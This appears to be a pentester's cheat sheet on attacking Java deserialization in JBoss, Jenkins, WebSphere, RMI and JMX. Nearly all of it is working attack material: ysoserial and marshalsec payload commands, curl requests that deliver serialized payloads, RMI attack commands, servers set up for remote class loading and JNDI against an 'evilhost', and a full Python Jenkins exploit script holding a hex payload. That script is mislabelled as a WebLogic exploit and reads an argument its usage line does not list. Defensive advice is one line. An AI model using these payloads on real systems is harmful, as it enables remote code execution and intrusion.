Skip to content

Java Deserialization

Java Deserialization

Java Unmarshaller Security

In debpth blog post into the WebLogic, WebSphere, JBoss, Jenkins, OpenNMS Exploits
Java Deserialization Cheat Sheet
Encoding Payloads to exfil data

Detecting Java Serialization:
- Hex data begins with AC ED 00 05
- Base64 data begins with rO0AB
- Content Type is application/x-java-serialized-object
- gzip data begins with H4sIAAAAAAAAAJ

Where Serialization is Used:
- In HTTP requests – Parameters, ViewState, Cookies, you name it.
- RMI – The extensively used Java RMI protocol is 100% based on serialization
- RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects
- JMX – Again, relies on serialized objects being shot over the wire
- Custom Protocols – Sending an receiving raw Java objects is the norm – which we’ll see in some of the exploits to come

Finding Gadgets Manually

If these callbacks are used then a deseralized data can used to exploit the server

Callbacks that are called when Deseralize is called:
- readObject()
- readExternal()
- readResolve()
- readObjectNoData()
- validateObject()
- finalize()

Find Java Classes with GadgetProbe

https://github.com/BishopFox/GadgetProbe

Find Gadget Chains with Gadget Inspector

Finding Chains in Android files:

>>> java -Xmx2G -jar /opt/Hacking/Web/gadget-inspector-all.jar ./edge-dex2jar.jar
>>> cat gadget-chains.txt       
org/apache/log4j/pattern/LogEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
  org/apache/log4j/pattern/LogEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
  java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)

org/apache/log4j/spi/LoggingEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
  org/apache/log4j/spi/LoggingEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
  java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)

Find Jars in ClassPath with EnumJavaLibs

https://github.com/redtimmy/EnumJavaLibs

./getPopularJars.py 20 | while read x; do wget --quiet -P ~/.serially/jars $x; sleep 5; done

How to Fix

Look-Ahead Checks: use a whitelist to validate the classes that can be deseralized

Bypasses

SeralKillerBypassGadgetCollection

Payloads

Generating Payloads with yoserial

Download the jar file here

Examples:

java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
nc 10.10.10.10 1099 < groovypayload.bin

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

java -jar ysoserial.jar URLDNS https://test.example.com

Generating Payloads with marshalsec

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF0 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF3 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMFX -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Burlap -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Java -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.JsonIO -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.JYAML -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Kryo -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.KryoAltStrategy -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Red5AMF0 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Red5AMF3 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.SnakeYAML -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.YAMLBeans -a

Generating Payloads with jexboss

Java Deserialization Exploitation Tool

DNS Lookup Example:

python2 jexboss.py -u http://vulnerable_java_app/path --gadget dns --dns random.burpdomain.com

Jenkins Exploit using JexBoss:

python2 jexboss.py -u http://vulnerable_java_app/jenkins --jenkins

Apache Struts2 Vulnerabilities (CVE-2017-5638)

python2 jexboss.py -u http://vulnerable_java_app/path.action --struts2

Exploiting JBoss

Paths to Check:
- /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
- /web-console/ServerInfo.jsp
- /invoker/JMXInvokerServlet
- /invoker/readonly
- /invoker/
- /
- /admin-console/

Jboss Exploit Example:

java -jar /opt/Hacking/Web/ysoserial-master-30099844c6-1.jar CommonsCollections1 id | curl -H "Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue" --data-binary @- -X POST -vvv http://test.com:8080/invoker/JMXInvokerServlet

Remote Class Loading Exploit

Create Payload:

java -jar ysoserial.jar C3P0 http://127.0.0.1:8080/:ExportObject > payload.bin

Setup Server:

>>> git clone https://github.com/sciccone/evil-remote-classloader
>>> java -jar evil-remote-classloader/output.jar -l 127.0.0.1 -p 8080 -c "id>/tmp/rce"
[+] Remote classloader configured.
[+] Listening on http:127.0.0.1:8080 - Class name: ExportObject

JNDI Lookup Exploitation

Create Payload:

java -jar ysoserial.jar SpringJta "ldap://evilhost:1389/ExportObject" > payload.bin

Setup Server:

>>> git clone https://github.com/sciccone/evil-ldap-service
>>> java -jar evil-remote-classloader/output.jar -l 127.0.0.1 -lp 1389 -p 8080 -c "id>/tmp/rce"

DNS Resolution Exploitation

Create Payload:

java -jar ysoserial.jar URLDNS "http://<random>.burp.example.com" > payload.bin

Get Classes to use:
GadgetProbe

JRMPClient Exploitation

Create Payload:

java -jar ysoserial.jar JRMPClient 127.0.0.1:9090 > payload.bin

Setup Server:

java -jar ysoserial.jar ysoserial.exploit.JRMPListener 9090 CommonsCollections4 "id>/tmp/rce"

Note

If retrieve error simular error then its blocked in the running JDK. 

Mar 09, 2020 5:58:50 PM java.io.ObjectInputStream filterCheck
INFO: ObjectInputFilter REJECTED: class java.util.PriorityQueue, array length: -1, nRefs: 2, depth: 1, bytes: 124, ex: n/a

Web Logic Exploit

#!/usr/bin/python

#usage: ./jenkins.py URL /path/to/payload
from urllib.parse import urlparse
import socket, sys, requests
import base64

url = urlparse(sys.argv[1])
payload_file = sys.argv[2]

#Query Jenkins over HTTP to find what port the CLI listener is on
r = requests.get("{scheme}://{netloc}".format(url**))
cli_port = int(r.headers['X-Jenkins-CLI-Port'])

#Open a socket to the CLI port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (url.netloc, cli_port)
print(f"Connecting to {url.netloc} port {cli_port}")
sock.connect(server_address)

# Send headers
headers=b'\x00\x14Protocol:CLI-connect'
print(f'Sending "{headers}"')
sock.send(headers)

data = sock.recv(1024)
#print(sys.stderr, 'received "%s"' % data)

data = sock.recv(1024)
#print(sys.stderr, 'received "%s"' % data)

payloadObj = open(sys.argv[3],'rb').read()
payload_b64 = base64.b64encode(payloadObj)
payload = b"<===[JENKINS REMOTING CAPACITY]===>"
payload += payload_b64
payload += bytes.fromhex("00000000112daced00057372001b687564736f6e2e72656d6f74696e672e557365725265717565737400000000000000010200034c0010636c6173734c6f6164657250726f78797400304c687564736f6e2f72656d6f74696e672f52656d6f7465436c6173734c6f616465722449436c6173734c6f616465723b5b0007726571756573747400025b424c0008746f537472696e677400124c6a6176612f6c616e672f537472696e673b78720017687564736f6e2e72656d6f74696e672e52657175657374000000000000000102000349000269644900086c617374496f49644c0008726573706f6e736574001a4c687564736f6e2f72656d6f74696e672f526573706f6e73653b78720017687564736f6e2e72656d6f74696e672e436f6d6d616e6400000000000000010200014c00096372656174656441747400154c6a6176612f6c616e672f457863657074696f6e3b78707372001e687564736f6e2e72656d6f74696e672e436f6d6d616e6424536f7572636500000000000000010200014c00067468697324307400194c687564736f6e2f72656d6f74696e672f436f6d6d616e643b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00035b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0010707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd223902000078700000000c7372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00034c000866696c654e616d6571007e00034c000a6d6574686f644e616d6571007e0003787000000043740017687564736f6e2e72656d6f74696e672e436f6d6d616e6474000c436f6d6d616e642e6a6176617400063c696e69743e7371007e00130000003271007e001571007e001671007e00177371007e001300000063740017687564736f6e2e72656d6f74696e672e5265717565737474000c526571756573742e6a61766171007e00177371007e00130000003c74001b687564736f6e2e72656d6f74696e672e557365725265717565737474001055736572526571756573742e6a61766171007e00177371007e001300000308740017687564736f6e2e72656d6f74696e672e4368616e6e656c74000c4368616e6e656c2e6a61766174000463616c6c7371007e0013000000fa740027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657274001c52656d6f7465496e766f636174696f6e48616e646c65722e6a617661740006696e766f6b657371007e0013ffffffff740017687564736f6e2e72656d6f74696e672e2450726f7879317074000f77616974466f7250726f70657274797371007e0013000004e771007e002071007e002174001577616974466f7252656d6f746550726f70657274797371007e00130000009374000e687564736f6e2e636c692e434c49740008434c492e6a61766171007e00177371007e00130000004874001f687564736f6e2e636c692e434c49436f6e6e656374696f6e466163746f7279740019434c49436f6e6e656374696f6e466163746f72792e6a617661740007636f6e6e6563747371007e0013000001df71007e002d71007e002e7400055f6d61696e7371007e00130000018671007e002d71007e002e7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e000f7872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e003c7871007e0008000000010000000070737d00000002002e687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f616465722449436c6173734c6f61646572001c687564736f6e2e72656d6f74696e672e49526561645265736f6c7665787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b787073720027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657200000000000000010300055a00146175746f556e6578706f7274427943616c6c65725a0009676f696e67486f6d654900036f69645a00097573657250726f78794c00066f726967696e71007e000d7870000000000002007371007e000b71007e004374007850726f787920687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572403220776173206372656174656420666f7220696e7465726661636520687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f616465722449436c6173734c6f616465727571007e00110000000d7371007e00130000007d71007e002471007e002571007e00177371007e00130000008971007e002471007e0025740004777261707371007e00130000026a71007e002071007e00217400066578706f72747371007e0013000002a6740021687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f6164657274001652656d6f7465436c6173734c6f616465722e6a61766171007e004a7371007e00130000004671007e001d71007e001e71007e00177371007e00130000030871007e002071007e002171007e00227371007e0013000000fa71007e002471007e002571007e00267371007e0013ffffffff71007e00287071007e00297371007e0013000004e771007e002071007e002171007e002b7371007e00130000009371007e002d71007e002e71007e00177371007e00130000004871007e003071007e003171007e00327371007e0013000001df71007e002d71007e002e71007e00347371007e00130000018671007e002d71007e002e71007e003671007e003a7878757200025b42acf317f8060854e0020000787000000746aced000573720032687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572245250435265717565737400000000000000010200044900036f69645b0009617267756d656e74737400135b4c6a6176612f6c616e672f4f626a6563743b4c000a6d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000574797065737400135b4c6a6176612f6c616e672f537472696e673b7708fffffffe0000000278720017687564736f6e2e72656d6f74696e672e52657175657374000000000000000102000349000269644900086c617374496f49644c0008726573706f6e736574001a4c687564736f6e2f72656d6f74696e672f526573706f6e73653b77040000000078720017687564736f6e2e72656d6f74696e672e436f6d6d616e6400000000000000010200014c00096372656174656441747400154c6a6176612f6c616e672f457863657074696f6e3b77040000000078707372001e687564736f6e2e72656d6f74696e672e436f6d6d616e6424536f7572636500000000000000010200014c00067468697324307400194c687564736f6e2f72656d6f74696e672f436f6d6d616e643b770400000000787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc40200007704fffffffd787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00025b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b7704fffffffd787071007e0010707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007704fffffffd78700000000b7372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00024c000866696c654e616d6571007e00024c000a6d6574686f644e616d6571007e00027704fffffffd787000000043740017687564736f6e2e72656d6f74696e672e436f6d6d616e6474000c436f6d6d616e642e6a6176617400063c696e69743e7371007e00130000003271007e001571007e001671007e00177371007e001300000063740017687564736f6e2e72656d6f74696e672e5265717565737474000c526571756573742e6a61766171007e00177371007e001300000239740032687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572245250435265717565737474001c52656d6f7465496e766f636174696f6e48616e646c65722e6a61766171007e00177371007e0013000000f6740027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657271007e001e740006696e766f6b657371007e0013ffffffff740017687564736f6e2e72656d6f74696e672e2450726f7879317074000f77616974466f7250726f70657274797371007e0013000004e7740017687564736f6e2e72656d6f74696e672e4368616e6e656c74000c4368616e6e656c2e6a61766174001577616974466f7252656d6f746550726f70657274797371007e00130000009374000e687564736f6e2e636c692e434c49740008434c492e6a61766171007e00177371007e00130000004874001f687564736f6e2e636c692e434c49436f6e6e656374696f6e466163746f7279740019434c49436f6e6e656374696f6e466163746f72792e6a617661740007636f6e6e6563747371007e0013000001df71007e002a71007e002b7400055f6d61696e7371007e00130000018671007e002a71007e002b7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e000f7704fffffffd7872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7704fffffffd7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657704fffffffd7870000000007704000000007871007e00397871007e000800000000000000007000000001757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007704fffffffd787000000001740018687564736f6e2e636c692e436c69456e747279506f696e7471007e0024757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007704fffffffd7870000000017400106a6176612e6c616e672e4f626a65637474001d5250435265717565737428312c77616974466f7250726f706572747929")

print('sending payload...')
'''outf = open('payload.tmp','w')
outf.write(payload)
outf.close()'''
sock.send(payload)

Websphere-Soap-Exploit

Example Request:

echo -e "<?xml version='1.0' encoding='UTF-8'?>\n
<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.1\" ns0:JMXMessageVersion=\"1.2.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\n<LoginMethod>BasicAuth</LoginMethod>\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">$(java -jar /opt/Hacking/Web/ysoserial-master-30099844c6-1.jar CommonsCollections1 id | base64)</objectname>\n<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>\n</ns1:getAttribute>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>" | curl -H "Content-Type: text/xml; charset=utf-8" -H 'SOAPAction: "urn:AdminService"' --data-binary @- -X POST -vvv https://test.com:8880/

RMI Exploiting

Introduction to Java RMI with examples
- https://www.geeksforgeeks.org/remote-method-invocation-in-java/
- https://mkyong.com/java/java-rmi-distributed-objects-example/
Very well written researches on how to attack Java RMI
- https://mogwailabs.de/blog/2019/04/attacking-rmi-based-jmx-services/
- https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/
- https://i.blackhat.com/eu-19/Wednesday/eu-19-An-Far-Sides-Of-Java-Remote-Protocols.pdf
Latest bypass gadget for the RMI registry whitelist (fixed in JKD8u241)
- https://mogwailabs.de/blog/2020/02/an-trinhs-rmi-registry-bypass/
- https://www.youtube.com/watch?v=tj6MdgfjQTU

Enumerate Classes with BaRMIe:

java -jar BaRMIe_v1.01.jar -enum 10.0.0.1 1099

Attack Service:

java -jar BaRMIe_v1.01.jar -attack 10.0.0.1 1099

Attack RMI with yososerial:

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 10.0.0.1 1099 CommonsBeanutils1 "touch /tmp/rce"

Attack JRMP with yososerial:

java -cp ysoserial.jar ysoserial.exploit.JRMPClient 10.0.0.1 1099 CommonsBeanutils1 "touch /tmp/rce"

JMX Exploitation

https://github.com/mogwailabs/mjet

JMS Exploitation

https://github.com/matthiaskaiser/jmet

AMQP Exploitation

XMLEncoder (XML)

XStream (XML/JSON/various)

Kryo (binary)

Hessian/Burlap (binary/XML)

Castor (XML)

json-io (JSON)

Jackson (JSON)

Fastjson (JSON)

Genson (JSON)

Red5 IO AMF (AMF)

Apache Flex BlazeDS (AMF)

Flamingo AMF (AMF)

GraniteDS (AMF)

WebORB for Java (AMF)

SnakeYAML (YAML)

jYAML (YAML)

YamlBeans (YAML)

"Safe" deserialization

JMX

siberas JMX exploitation toolkit